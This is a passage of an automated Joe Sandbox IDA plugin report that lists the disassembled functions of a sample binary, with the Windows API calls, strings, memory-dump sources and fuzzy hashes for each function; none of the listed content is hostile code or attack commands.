                                            • Part of subcall function 00F89DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F873BC,?,?,?,00000000), ref: 00F89DBC
                                            • Part of subcall function 00F89DA2: SetFileTime.KERNEL32(?,?,?,?), ref: 00F89E70
                                            • Part of subcall function 00F89620: CloseHandle.KERNEL32(000000FF,?,?,00F895D6,?,?,?,?,?,00FB2641,000000FF), ref: 00F8963B
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                          • API String ID: 3983180755-3508440684
                                          • Opcode ID: 294751548aa72cf8e68296a6783674deca39edef75e20afabf21de2befa12b7e
                                          • Instruction ID: 1f889690f78be1102c08492c4ca2c8e87d4c769895c722a6791fb66956ce4aee
                                          • Opcode Fuzzy Hash: 294751548aa72cf8e68296a6783674deca39edef75e20afabf21de2befa12b7e
                                          • Instruction Fuzzy Hash: C9C1F671D04704AAEB21FB74CC85FEEB7A8AF04300F14455AF956E3282D778EA44EB61
                                          Function 00FAD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: 65f65e1898e6f4c0340e6440fdada032ad40a55b1c69c9d19b7d2139bc34ace0
                                          • Instruction ID: e832e76190c9d4c3f719c12d7eea45cff0ab5af3a995b172058aa9776e38f990
                                          • Opcode Fuzzy Hash: 65f65e1898e6f4c0340e6440fdada032ad40a55b1c69c9d19b7d2139bc34ace0
                                          • Instruction Fuzzy Hash: D8C250B2E046288FDB25CF28DD407EAB7B5EB49354F1541EAD44EE7240E778AE819F40
                                          Function 00F832F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog_swprintf
                                          • String ID: CMT$h%u$hc%u
                                          • API String ID: 146138363-3282847064
                                          • Opcode ID: 9e76dcedf44c6e743b2b60fd61ac9248dad5e137f6c7fd0b8eeb364edc21f5fb
                                          • Instruction ID: 8eba6f5f7078a28e2e60068065a559b57a9b204e6cfa483cc2d77777d622077e
                                          • Opcode Fuzzy Hash: 9e76dcedf44c6e743b2b60fd61ac9248dad5e137f6c7fd0b8eeb364edc21f5fb
                                          • Instruction Fuzzy Hash: D33207715103849FDF18EF74CC96AE93BA5AF55700F08047DFC8A8B292DB78A649DB60
                                          Function 00F8286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F82874
                                          • _strlen.LIBCMT ref: 00F82E3F
                                            • Part of subcall function 00F902BA: __EH_prolog.LIBCMT ref: 00F902BF
                                            • Part of subcall function 00F91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F8BAE9,00000000,?,?,?,0001040C), ref: 00F91BA0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F82F91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                          • String ID: CMT
                                          • API String ID: 1206968400-2756464174
                                          • Opcode ID: 8d64104a1cd0b8a7a7f41d22957b76a1496f9ec8a51816aa7eeafd4102ab8a5c
                                          • Instruction ID: a4851bc42b8ba8313b54a5e076ea8e2e98f86bc6e285854e9e7252bc1fc6868d
                                          • Opcode Fuzzy Hash: 8d64104a1cd0b8a7a7f41d22957b76a1496f9ec8a51816aa7eeafd4102ab8a5c
                                          • Instruction Fuzzy Hash: F6621B72A002458FDF19EF34C8857EA3BA1FF55310F04457EEC9A8B282DB75A945EB60
                                          Function 00F9F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F9F844
                                          • IsDebuggerPresent.KERNEL32 ref: 00F9F910
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F9F930
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F9F93A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 22c1bb8a109d21b676e5fd856dc5bed8ab0bb150f1f788701017b798202253ab
                                          • Instruction ID: 5f4af1aecdf3f50ea621c7717c49667aafd165acda6983cf9612cd62f0ff8fd7
                                          • Opcode Fuzzy Hash: 22c1bb8a109d21b676e5fd856dc5bed8ab0bb150f1f788701017b798202253ab
                                          • Instruction Fuzzy Hash: D1311875D4521D9BEF20DFA4DD897CCBBB8AF08304F1041AAE40CAB250EB759B889F44
                                          Function 00F9E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • VirtualQuery.KERNEL32(80000000,00F9E5E8,0000001C,00F9E7DD,00000000,?,?,?,?,?,?,?,00F9E5E8,00000004,00FE1CEC,00F9E86D), ref: 00F9E6B4
                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00F9E5E8,00000004,00FE1CEC,00F9E86D), ref: 00F9E6CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: InfoQuerySystemVirtual
                                          • String ID: D
                                          • API String ID: 401686933-2746444292
                                          • Opcode ID: 1e744db3d4ea21371a7652445fca65d997f0fb5343b79c41994e1b2a6901e8d2
                                          • Instruction ID: 8c6fc65bf444a7dc96d41a8fdac26b6e0a0ef94c30189451979c77e333e3a0af
                                          • Opcode Fuzzy Hash: 1e744db3d4ea21371a7652445fca65d997f0fb5343b79c41994e1b2a6901e8d2
                                          • Instruction Fuzzy Hash: 8101F732A40109ABDF14DE69DC49BDD7BAAAFC4334F0CC224ED19D7150E634D9059A81
                                          Function 00FA8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FA8FB5
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FA8FBF
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FA8FCC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 77fb4e877c8c0e101743cb9749241fbac1d4169c0b19341d47dcbe572a3665e8
                                          • Instruction ID: 06c7be58e964e38e80d9c2173d72c53ec814bc4358f3541add3c7af28e177c5e
                                          • Opcode Fuzzy Hash: 77fb4e877c8c0e101743cb9749241fbac1d4169c0b19341d47dcbe572a3665e8
                                          • Instruction Fuzzy Hash: 2C31D775D4121DABCB21DF64DC8879CBBB8AF48310F5042EAE41CA6250EB749F859F44
                                          Function 00FAB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e30ff971084ee0f78698935effd1a6131f022d4563f2172f109d266998a61ad1
                                          • Instruction ID: fe03eb3580e29bae661c9b923b7a46076ab32de5c2b8cf2e928f2b2c70d363f2
                                          • Opcode Fuzzy Hash: e30ff971084ee0f78698935effd1a6131f022d4563f2172f109d266998a61ad1
                                          • Instruction Fuzzy Hash: 8A3106B19002496FCB24DE78CC84EFA7BBDDB86314F1442A8E918D7253E7349D45AB50
                                          Function 00FAD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                          • Instruction ID: a34fa20681c56537e96ed5192ed89590ed7f372d4775af0ad2ec1488ad4e3b10
                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                          • Instruction Fuzzy Hash: 71022CB1E012199FDF18CFA9C9806ADB7F1EF49324F258169D81AE7780D734AD41DB90
                                          Function 00F9AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F9AF35
                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00FBE72C,?,?,?,?,?,00000032), ref: 00F9AF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FormatInfoLocaleNumber
                                          • String ID:
                                          • API String ID: 2169056816-0
                                          • Opcode ID: b169284ec9cdf1aa3d2f16f534f241446c966166dde5859a63cb846f181367b7
                                          • Instruction ID: 828c9f25bf70862814597173804152a25439b2bfa24eb59d14adfcaf14877135
                                          • Opcode Fuzzy Hash: b169284ec9cdf1aa3d2f16f534f241446c966166dde5859a63cb846f181367b7
                                          • Instruction Fuzzy Hash: F901BC7A51030CAADB109F74EC49FDA77BCEF08310F404022FA15A7191E774AA29DFA5
                                          Function 00F86C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00F86DDF,00000000,00000400), ref: 00F86C74
                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F86C95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 654319ae2bfeb5653a015c9fec0dd6b2fbf0b3b02adbedbf158e832cb43022cf
                                          • Instruction ID: 08dc485d37586611d05dc9ca6401546ed309338fcf1a0af2d0d5463aed9b968a
                                          • Opcode Fuzzy Hash: 654319ae2bfeb5653a015c9fec0dd6b2fbf0b3b02adbedbf158e832cb43022cf
                                          • Instruction Fuzzy Hash: 3AD0A971388304BFFA002B219C47F6A3B98BF42B93F18C004B380E80E0CA709420BB28
                                          Function 00FB19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FB19EF,?,?,00000008,?,?,00FB168F,00000000), ref: 00FB1C21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: 45710de01eac9fcd9ae149c7def4217db5ed54c7d9e8c499828efc6657869bc7
                                          • Instruction ID: 3581c0717914124cf49d141cf14daf7c3e8dba05a8701437735f43b62a1839bb
                                          • Opcode Fuzzy Hash: 45710de01eac9fcd9ae149c7def4217db5ed54c7d9e8c499828efc6657869bc7
                                          • Instruction Fuzzy Hash: 07B18A72610608CFD719CF29C4AABA47BE0FF45364F658658E89ACF2A1C335E991DF40
                                          Function 00F9F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F9F66A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: c90a8bf60031bd5972b97a3a843f0e01fc87072fb6ff4c6ae8c671f298e698b7
                                          • Instruction ID: a478135d1ca52fb4869d276525196ad8367753377fea96aae8a465b5551c28e7
                                          • Opcode Fuzzy Hash: c90a8bf60031bd5972b97a3a843f0e01fc87072fb6ff4c6ae8c671f298e698b7
                                          • Instruction Fuzzy Hash: 12515BB1E006198FEF25CF99E9817AABBF4FB88364F24852AD411EB250D3749904DF60
                                          Function 00F8B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: ad9eef69fb8416c6acd04ed3c10dedecbd746f3a7adaa5aa2121a1b50422d82b
                                          • Instruction ID: 65a22bb14f3f02289a7f9f3393a6044c2d7d5a68d353707eb05a308936fdfbea
                                          • Opcode Fuzzy Hash: ad9eef69fb8416c6acd04ed3c10dedecbd746f3a7adaa5aa2121a1b50422d82b
                                          • Instruction Fuzzy Hash: 8EF09AB5E0060C8FCB28EF18ED96AD977F1FB89718F100395D50693390C3B0A990AF60
                                          Function 00F840FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: gj
                                          • API String ID: 0-4203073231
                                          • Opcode ID: 6f6528f261b34a143c020271d083ed5d1294d2f61119b30edbfabc4ad611adb3
                                          • Instruction ID: a4335bc3bc6beadf4f793c21035c46b245b84e2a5955d39cd53d3e9084160e19
                                          • Opcode Fuzzy Hash: 6f6528f261b34a143c020271d083ed5d1294d2f61119b30edbfabc4ad611adb3
                                          • Instruction Fuzzy Hash: 8CC14772A083418FC354CF29D880A5AFBE2BFC8208F59892DE998D7311D734E944DF96
                                          Function 00F9F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00F9F3A5), ref: 00F9F9DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 2eea1ce118bc6e306b3b109d5d3f72e939740a7e9268fcd48a8bf27a27167d16
                                          • Instruction ID: 5557669e9a8216beefd078d622c9727b46fdf4b60a139a1ce69a71f03cbcf28b
                                          • Opcode Fuzzy Hash: 2eea1ce118bc6e306b3b109d5d3f72e939740a7e9268fcd48a8bf27a27167d16
                                          • Instruction Fuzzy Hash:
                                          Function 00FAC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
